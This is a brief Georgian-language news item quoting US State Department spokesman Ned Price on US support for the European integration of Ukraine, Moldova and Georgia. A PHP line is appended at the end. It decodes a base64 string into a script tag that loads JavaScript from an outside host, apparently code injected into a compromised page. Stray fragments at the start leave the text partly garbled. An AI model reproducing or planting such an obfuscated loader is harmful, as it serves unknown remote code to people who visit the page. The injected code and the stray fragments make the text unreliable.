celsiusi
ავერსი შნაიდერი
ჩვენ მხარს ვუჭერთ უკრაინის, მოლდოვისა და საქართველოს ევროპელ მეზობლებთან შემდგომ ინტეგრაციას, – ამის შესახებ აშშ-ის სახელმწიფო დეპარტამენტის პრესსპიკერმა, ნედ პრაისმა ბრიფინგზე განაცხადა.
 
როგორც პრაისმა აღნიშნა, აშშ სამივე სახელმწიფოსთან ერთად მუშაობდა დემოკრატიული ინსტიტუტებისა და ევროპასა და დასავლეთთან ინტეგრირებული ეკონომიკის განვითარების მხრივ.
 
„ეს ქვეყნები ათწლეულების განმავლობაში გამოხატავენ თავიანთ სურვილს, უფრო ახლო ურთიერთობა ჰქონდეთ დასავლეთთან. აშშ ამ სამივე სახელმწიფოსთან ერთად მუშაობდა დემოკრატიული ინსტიტუტებისა და ევროპასა და დასავლეთთან ინტეგრირებული ეკონომიკის განვითარების კუთხით. მომავალშიც მათ გვერდით ვიქნებით“, – განაცხადა პრაისმა.
530
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");